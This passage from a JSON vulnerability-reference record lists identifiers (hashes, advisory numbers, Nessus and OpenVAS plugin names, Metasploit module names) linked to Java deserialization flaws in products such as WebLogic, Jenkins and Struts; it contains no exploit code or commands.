"70637707AD35FFD7CA24C460E8B9C97FF5600A40305CB32EDECFB2C1C9A98F05", "709E27E3685930B945F2FBC357A30EA55914B7F6AA51DED371226AB763C07085", "7196C8D1335ADFCDC76659DB37704C37F43BFC5EAAC5070B6B965CB49E2ED826", "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "79F48BEE0E5A2E069BD89DB00CEE2085DF9E0E6BE97901C5D6431550085B5EE6", "7AE79CBB38C9B30F603A5F44A9B8F142162D6B14888148AC3503AD993B81C776", "7AE8462B1ED6BC7CB18D0E602A33B224072317EEACEC3938F0976678B0C95AD4", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "7E1AD56C932EE6022D560B647F3D701B90E917C8D245F2619F30EAFAE93014A2", "84ADA1A0F9193EF446D20A2AE6CBA8AD78BD934525DE84341357005D9E20113E", "8539DE7456A757926C37A62C64709FF860DF8937A7CC31706F5AC8F487B2536C", "858C7CB29A95643000EADA0C1DB3FB5D46EEA8B81788EBA2B778EE7CBE075776", "872BD873063FFAF2EF7288B9566A9CA58451B802A0465ADE67F67B5E43921382", "88059994BDF023078EC1A0894C156708EBE6348CEBD9AE468DB229EA67B1E1FA", "8A242C548ADF3E615FE6BA32C7E6F5B2DB8B1FA250ABF2329DC20A0FB32D3700", "8A58A1DA760D7C9AA9496CCEB8F8DD3ECEA3B210C20F1C397D073382709059F3", "8A9198697F8388FC75E2DA73A2811AC8903D8787718F479A630B9674D8C0DC03", "8B09C9492941B8B6C6FB844862484437C6E439C77EC2B6E2EA1BC5C87B890DBB", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA", "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "9A0B377B539E9EB3DEAE72601B316AC39529FEB48D77BA9C2660AD88E7DF662B", "9AE27752CE61B7806165EEC477048C9431337F2A610460AB42D12020D03EF964", "9C3CAFB5742400AAC9286EB9089506FEA84581BB4A12DAB6BB996F50EB47E45E", "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "9D7005B758961DB83E562429E679C1FF93E8A3CBFDA5A6EEC3C6B52C734D2869", "9E20D1855575208AB10D7A37A8F732F5FB0995B4D096646EBC735EE1706B18C6", "9E3FCEB3C8DC76AD3152DBCC2EFEFAB5F229FFCEF4CF1D756D45190726CF3D0D", "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "A54D5DA424A230A6C4C61FA58EB1A69719615CD1E841D07FDB1CEC9FE4659E45", "A6B089124F750729C2A5DCFDD551701AB74968E1A86A4C4BE83273F5F8E1BE38", "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "AB8332BB49251697A40C4A181070CC821286458CE2114BD526688971705EBC0B", "AC33843924B6A7415E2B5520B228A4C48ECE79D3ED971F29EAFD5A574C45E7BF", "AC54A5DAFA15D91044EA9FE6159829752BCD0E35D53719860B2A80D7AB2DBBA9", "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "B0549540072FC1BB0D803052330E32E656605B46C7EDC1BE259FE2273831E00B", "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "B0A606101370774E5FB3E4409A17D910B4B5997971AC7B7045727379D355B696", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B45ABED8BD58C33A07263A55AF5D4FCACA1D1D4D41B9076C9B3E26F4C663C536", "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "B5810DD31544DECD338CCD71F5C05C78B267068FE3FD01928B5545B05BEE5FA0", "B61AB1D0CA790E1ACAC9798122DF79FFCF9B8B2580CDC33E702C953B7EF6B140", "B634FF2E7FC1F3330432FBCA9743C474852276C64003951811F2A870EB1D6D85", "B6C593CFA8F4C1195B7D65B41828D25967C1BADAD2B07C2F63837A7BFA7E189E", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085", "BC89FD795C8D2727ED36F68D3C0CB562583E29BA6F46C7C0230E9FDCF5110D99", "C03FA5EBB009D6B1F8AADC24B78B9ABD8ADACBA78E030EBADE0D37E5B4B8531B", "C08849A00434A559EE1C5504DAE1CDDB28E9D46EDC400E95B2136AC317DFE7A3", "C2589DFBD09C40CB0ED3C14A127AD44309E3A47D40C1ABCBAA157F4307C403C7", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C4201BA18FD219F4998B9CD1F31247B019E4B70DABFE54578652DCDBE9377D5D", "C4A25CF6BA3F6E71753F4E3FF5296DCAEA56B938BAE00EF5CB5BBAB12BD4FE3F", "C55D668E9DAA959DD19BE97127802F50A829DCC234E975F8050767FE8AEFE217", "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED", "C9A06C4BC1ACE55A17C7DD2D9DD98AA6FDEE59C9586CAFC2375754D88139C6F2", "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56", "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "CE820FD4621D83AF3E51CFD93CBDEF291F0771A4EE878E6401156E6ED47270AB", "D25FC5FB8A8B1C59AB072CD2FAFBE0E65B654246DF1F523B2F0760F380BBA57D", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D4C1C0E6A5170ECC8C7B3DFFE304FF401A904E8D9E1A70A203081EBBCDBE568F", "D5DD24C882DBB1D9A7CA1FF6A2B5E71A2110BD5524772EF5C4D134F94002AC84", "D66F1CF05D4FAEAA1D2A1BD6C942DFBCEFA7698121E07EA674D81BA77E984AF6", "D6EF0A354BC60FD9763CCD91736DAA8B1445C437C0A7B30389216581A9447D9D", "D71ECE9054A0423D2796261CBA40257762AA9E2D7719136781F2B173EA9107E9", "D807F98F285E9AA24C6982ECD7ECE986CC9DAEE3771B85EB11104E7DB3A38BAE", "D86489221457B61FCC95E41FD2271EB756D72E51AED6BEEA73DF5EA02691AB18", "D9F9C21739CE0374485FD9F451E99B1E3D3DD763F365282CE7DBE1FD581588A1", "DB2B818A328E9D978E389CD017B47DF75CF8C64900E023A2B46B5D029C47E02F", "DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1", "DE915924CF7F2670B1FFCDF6498DBB124F4087216A8B4D38EBCEE133912CE5E2", "DF1E63CF8B14528F156628BE21730C46B9AD6FEBFA9BE46C21DFFEFE8A0D3852", "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", "E19B380C2BF0F26DFDCBADD37C1B7D4A13ED463E7B4B4ECE7EEEC8895D5690CB", "E3BAE9A30B20D04512C7C16881BAE14D80726FD5F24F3B32C3DF1C51B000477A", "E54048B186E2B0430A492A11B734CD6DBAB437E3800A622970DF288484B9F9CA", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E9094C448DDFA53F1801F49370E9B1301873155775CFD8E4A6A53500E27FBB43", "EC04C84423EE0C4E734038A3305029BA46FF47C7662107F5FFC07C3ACF2F1F61", "F665A1245FF1694ED9B578D35C955B51DAA051F90350DA793AFAC0D05F2DCC0B", "F8AD49D8A73BB530C15AF495227B6C3747AE0CF3ACDA4A23CB12ECAB9ECF5B62", "F9ADD5C0B29D5EA4036B7F3A5477FA4502428CD7F7F7ABD1AF85EE16C6650D8F", "FCF66C1A96FDC8625BB9D927E042CEAA982B68F998C9AFCE8CBB28E803F9F816"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7314019160937441300", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2015-0296", "MGASA-2016-0012", "MGASA-2016-0090", "MGASA-2016-0137", "MGASA-2016-0149", "MGASA-2016-0406", "MGASA-2016-0417", "MGASA-2017-0333"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-MISC-JENKINS_JAVA_DESERIALIZE-", "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_REST_XSTREAM-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201672113", "MYHACK58:62201681747", "MYHACK58:62201783274", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784367", "MYHACK58:62201784379", "MYHACK58:62201785037", "MYHACK58:62201785372", "MYHACK58:62201785395", "MYHACK58:62201786819", "MYHACK58:62201789104", "MYHACK58:62201789628", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "700653.PRM", "700668.PASL", "700699.PASL", "9080.PRM", "9315.PRM", "9323.PRM", "9448.PRM", "9666.PRM", "9667.PRM", "9668.PRM", "9669.PRM", "9670.PRM", "9906.PASL", "ACTIVEMQ_5_13_0.NASL", "ACTIVEMQ_5_15_5.NASL", "AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2015-618.NASL", "ALA_ALAS-2016-679.NASL", "ALA_ALAS-2016-680.NASL", "ALA_ALAS-2016-681.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "ALA_ALAS-2022-1562.NASL", "BAMBOO_5_8_5.NASL", "CENTOS_RHSA-2015-2521.NASL", "CENTOS_RHSA-2015-2522.NASL", "CENTOS_RHSA-2015-2671.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "CENTOS_RHSA-2016-2045.NASL", "CENTOS_RHSA-2016-2599.NASL", "CENTOS_RHSA-2017-2423.NASL", "CENTOS_RHSA-2017-2486.NASL", "CISCO_CUCM_CSCUX34835.NASL", "CISCO_PRIME_INFRASTRUCTURE_20161291.NASL", "CISCO_PRIME_LMS_JAVA_DESER.NASL", "CISCO_SECURITY_JAVA_DESER.NASL", "COLDFUSION_AMF_DESERIALIZATION.NASL", "COLDFUSION_WIN_APSB17-14.NASL", "COLDFUSION_WIN_APSB17-30.NASL", "DEBIAN_DLA-274.NASL", "DEBIAN_DLA-435.NASL", "DEBIAN_DLA-443.NASL", "DEBIAN_DLA-451.NASL", "DEBIAN_DLA-728.NASL", "DEBIAN_DLA-729.NASL", "DEBIAN_DSA-3504.NASL", "DEBIAN_DSA-3524.NASL", "DEBIAN_DSA-3530.NASL", "DEBIAN_DSA-3552.NASL", "DEBIAN_DSA-3558.NASL", "DEBIAN_DSA-3609.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "EULEROS_SA-2016-1015.NASL", "EULEROS_SA-2016-1054.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "F5_BIGIP_SOL30518307.NASL", "F5_BIGIP_SOL58084500.NASL", "F5_BIGIP_SOL73112451.NASL", "FEDORA_2015-15899.NASL", "FEDORA_2015-15907.NASL", "FEDORA_2015-7CA4368B0C.NASL", "FEDORA_2015-EEFC5A6762.NASL", "FEDORA_2016-005AC9CFD5.NASL", "FEDORA_2016-0F490EEA10.NASL", "FEDORA_2016-368780879D.NASL", "FEDORA_2016-641C8B4EB2.NASL", "FEDORA_2016-6CF17AD0DF.NASL", "FEDORA_2016-93679A91DF.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FEDORA_2016-F099190FEE.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-6A0389A6A7.NASL", "FEDORA_2017-7E0FF7F73A.NASL", "FEDORA_2017-8348115ACD.NASL", "FEDORA_2017-9899ABA20E.NASL", "FEDORA_2017-B8358CDA24.NASL", "FEDORA_2018-639385F5EC.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "FREEBSD_PKG_1F1124FEDE5C11E58FA814DAE9D210B8.NASL", "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL", "FREEBSD_PKG_4AF92A40DB3311E6AE1B002590263BF5.NASL", "FREEBSD_PKG_5CFA9D0C73D74642AF4F28FBED9E9404.NASL", "FREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL", "FREEBSD_PKG_67B3FEF22BEA11E586FF14DAE9D210B8.NASL", "FREEBSD_PKG_7E01DF39DB7E11E5B93700E0814CAB4E.NASL", "FREEBSD_PKG_8C2B2F110EBE11E6B55EB499BAEBFEAF.NASL", "FREEBSD_PKG_9E5BBFFCD8AC11E5B2BD002590263BF5.NASL", "FREEBSD_PKG_A258604DF2AA11E5B4A9AC220BDCEC59.NASL", "GENTOO_GLSA-201606-18.NASL", "GENTOO_GLSA-201607-17.NASL", "GENTOO_GLSA-201610-01.NASL", "GENTOO_GLSA-201705-09.NASL", "HP_IMC_CVE-2016-4372.NBIN", "HP_INTELLIGENT_MANAGEMENT_CENTER_7_2.NASL", "HP_NETWORK_AUTOMATION_HPSBGN03649.NASL", "HP_OPERATIONS_MANAGER_FOR_WIN_CVE-2016-1985_LOCAL.NASL", "HP_OPERATIONS_ORCHESTRATION_HPSBGN03560.NASL", "IBM_JAVA_2016_04_19.NASL", "JBOSS_EAP_DOFILTER_RCE.NBIN", "JBOSS_JAVA_SERIALIZE.NASL", "JENKINS_1_650.NASL", "JENKINS_2_57.NASL", "JENKINS_SECURITY218.NASL", "JENKINS_SECURITY232.NASL", "JENKINS_SECURITY_ADVISORY_2017-02-01.NASL", "JUNIPER_SPACE_JSA_10838.NASL", "LEXMARK_MARKVISION_ENTERPRISE_2016_1487.NASL", "MCAFEE_EPO_SB10144.NASL", "MYSQL_ENTERPRISE_MONITOR_3_0_26.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_5_7958.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "MYSQL_ENTERPRISE_MONITOR_3_2_2_1075.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_8.NASL", "OPENSUSE-2016-1455.NASL", "OPENSUSE-2016-1456.NASL", "OPENSUSE-2016-351.NASL", "OPENSUSE-2016-370.NASL", "OPENSUSE-2016-384.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2015-2521.NASL", "ORACLELINUX_ELSA-2015-2522.NASL", "ORACLELINUX_ELSA-2015-2671.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLELINUX_ELSA-2016-2045.NASL", "ORACLELINUX_ELSA-2016-2599.NASL", "ORACLELINUX_ELSA-2017-2423.NASL", "ORACLELINUX_ELSA-2017-2486.NASL", "ORACLELINUX_ELSA-2022-9419.NASL", "ORACLE_BI_PUBLISHER_APR_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2017_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_JAN_2019.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_OCT_2018.NASL", "ORACLE_JAVA_CPU_APR_2016.NASL", "ORACLE_JAVA_CPU_APR_2016_UNIX.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "ORACLE_OATS_CPU_APR_2016.NASL", "ORACLE_OATS_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "ORACLE_RDBMS_CPU_OCT_2017.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JAN_2018_CPU.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2018.NBIN", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2016.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "REDHAT-RHSA-2015-2500.NASL", "REDHAT-RHSA-2015-2521.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2015-2535.NASL", "REDHAT-RHSA-2015-2536.NASL", "REDHAT-RHSA-2015-2538.NASL", "REDHAT-RHSA-2015-2539.NASL", "REDHAT-RHSA-2015-2540.NASL", "REDHAT-RHSA-2015-2542.NASL", "REDHAT-RHSA-2015-2671.NASL", "REDHAT-RHSA-2016-0070.NASL", "REDHAT-RHSA-2016-0489.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0711.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "REDHAT-RHSA-2016-1087.NASL", "REDHAT-RHSA-2016-1088.NASL", "REDHAT-RHSA-2016-1430.NASL", "REDHAT-RHSA-2016-1773.NASL", "REDHAT-RHSA-2016-2045.NASL", "REDHAT-RHSA-2016-2599.NASL", "REDHAT-RHSA-2016-2807.NASL", "REDHAT-RHSA-2017-0455.NASL", "REDHAT-RHSA-2017-0456.NASL", "REDHAT-RHSA-2017-1216.NASL", "REDHAT-RHSA-2017-1253.NASL", "REDHAT-RHSA-2017-1254.NASL", "REDHAT-RHSA-2017-1256.NASL", "REDHAT-RHSA-2017-1260.NASL", "REDHAT-RHSA-2017-1410.NASL", "REDHAT-RHSA-2017-1411.NASL", "REDHAT-RHSA-2017-1412.NASL", "REDHAT-RHSA-2017-1801.NASL", "REDHAT-RHSA-2017-2423.NASL", "REDHAT-RHSA-2017-2486.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2808.NASL", "REDHAT-RHSA-2017-2809.NASL", "REDHAT-RHSA-2017-2811.NASL", "REDHAT-RHSA-2017-3399.NASL", "REDHAT-RHSA-2018-1607.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SL_20161010_TOMCAT6_ON_SL6_X.NASL", "SL_20161103_TOMCAT_ON_SL7_X.NASL", "SL_20170807_LOG4J_ON_SL7_X.NASL", "SOLARWINDS_VIRTUALIZATION_MANAGER_RMI_DESERIALIZATION.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "SUSE_SU-2016-1299-1.NASL", "SUSE_SU-2016-1300-1.NASL", "SUSE_SU-2016-1303-1.NASL", "SUSE_SU-2016-1378-1.NASL", "SUSE_SU-2016-1379-1.NASL", "SUSE_SU-2016-1388-1.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_SYM15-011.NASL", "TOMCAT_6_0_45.NASL", "TOMCAT_7_0_68.NASL", "TOMCAT_8_0_32.NASL", "TOMCAT_8_5_8.NASL", "TOMCAT_9_0_0_M3.NASL", "UBUNTU_USN-2923-1.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "UBUNTU_USN-3024-1.NASL", "UBUNTU_USN-3177-1.NASL", "UBUNTU_USN-3177-2.NASL", "UBUNTU_USN-4557-1.NASL", "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2015_0009.NASL", "VMWARE_ORCHESTRATOR_VMSA_2015_0009.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCENTER_VMSA-2017-0007.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_V640_DESERIALIZATION.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "WEBLOGIC_2015_4852.NASL", "WEBLOGIC_2017_10271.NASL", "WEBSPHERE_JAVA_SERIALIZE.NASL", "WEBSPHERE_MQ_SWG21982566.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_112763"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105615", "OPENVAS:1361412562310105731", "OPENVAS:1361412562310105765", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310105828", "OPENVAS:1361412562310105829", "OPENVAS:1361412562310105830", "OPENVAS:1361412562310105835", "OPENVAS:1361412562310105838", "OPENVAS:1361412562310106144", "OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310107156", "OPENVAS:1361412562310107157", "OPENVAS:1361412562310108062", "OPENVAS:1361412562310108063", "OPENVAS:1361412562310108067", "OPENVAS:1361412562310108095", "OPENVAS:1361412562310108096", "OPENVAS:1361412562310108388", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310113012", "OPENVAS:1361412562310120608", "OPENVAS:1361412562310120669", "OPENVAS:1361412562310120670", "OPENVAS:1361412562310120671", "OPENVAS:1361412562310120678", "OPENVAS:1361412562310120682", "OPENVAS:1361412562310120689", "OPENVAS:1361412562310122791", "OPENVAS:1361412562310122792", "OPENVAS:1361412562310122934", "OPENVAS:1361412562310122935", "OPENVAS:1361412562310122936", "OPENVAS:1361412562310122937", "OPENVAS:1361412562310130082", "OPENVAS:1361412562310131177", "OPENVAS:1361412562310131247", "OPENVAS:1361412562310131300", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310140063", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310140254", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310703504", "OPENVAS:1361412562310703524", "OPENVAS:1361412562310703530", "OPENVAS:1361412562310703552", "OPENVAS:1361412562310703558", "OPENVAS:1361412562310703609", "OPENVAS:1361412562310703738", "OPENVAS:1361412562310703739", "OPENVAS:1361412562310806571", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310806624", "OPENVAS:1361412562310806913", "OPENVAS:1361412562310807001", "OPENVAS:1361412562310807275", "OPENVAS:1361412562310807331", "OPENVAS:1361412562310807332", "OPENVAS:1361412562310807351", "OPENVAS:1361412562310807408", "OPENVAS:1361412562310807415", "OPENVAS:1361412562310807551", "OPENVAS:1361412562310807701", "OPENVAS:1361412562310807702", "OPENVAS:1361412562310807703", "OPENVAS:1361412562310807707", "OPENVAS:1361412562310807907", "OPENVAS:1361412562310807933", "OPENVAS:1361412562310808269", "OPENVAS:1361412562310809026", "OPENVAS:1361412562310809053", "OPENVAS:1361412562310809055", "OPENVAS:1361412562310809062", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810938", "OPENVAS:1361412562310810965", "OPENVAS:1361412562310810966", "OPENVAS:1361412562310811005", "OPENVAS:1361412562310811006", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811696", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310811871", "OPENVAS:1361412562310813537", "OPENVAS:1361412562310814409", "OPENVAS:1361412562310842680", "OPENVAS:1361412562310842733", "OPENVAS:1361412562310842745", "OPENVAS:1361412562310842764", "OPENVAS:1361412562310842823", "OPENVAS:1361412562310843024", "OPENVAS:1361412562310843035", "OPENVAS:1361412562310851239", "OPENVAS:1361412562310851245", "OPENVAS:1361412562310851252", "OPENVAS:1361412562310851257", "OPENVAS:1361412562310851291", "OPENVAS:1361412562310851292", "OPENVAS:1361412562310851293", "OPENVAS:1361412562310851302", "OPENVAS:1361412562310851303", "OPENVAS:1361412562310851306", "OPENVAS:1361412562310851311", "OPENVAS:1361412562310851455", "OPENVAS:1361412562310851503", "OPENVAS:1361412562310869959", "OPENVAS:1361412562310871511", "OPENVAS:1361412562310871512", "OPENVAS:1361412562310871529", "OPENVAS:1361412562310871598", "OPENVAS:1361412562310871599", "OPENVAS:1361412562310871600", "OPENVAS:1361412562310871601", "OPENVAS:1361412562310871608", "OPENVAS:1361412562310871669", "OPENVAS:1361412562310871701", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310871954", "OPENVAS:1361412562310872082", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:1361412562310872442", "OPENVAS:1361412562310872446", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", 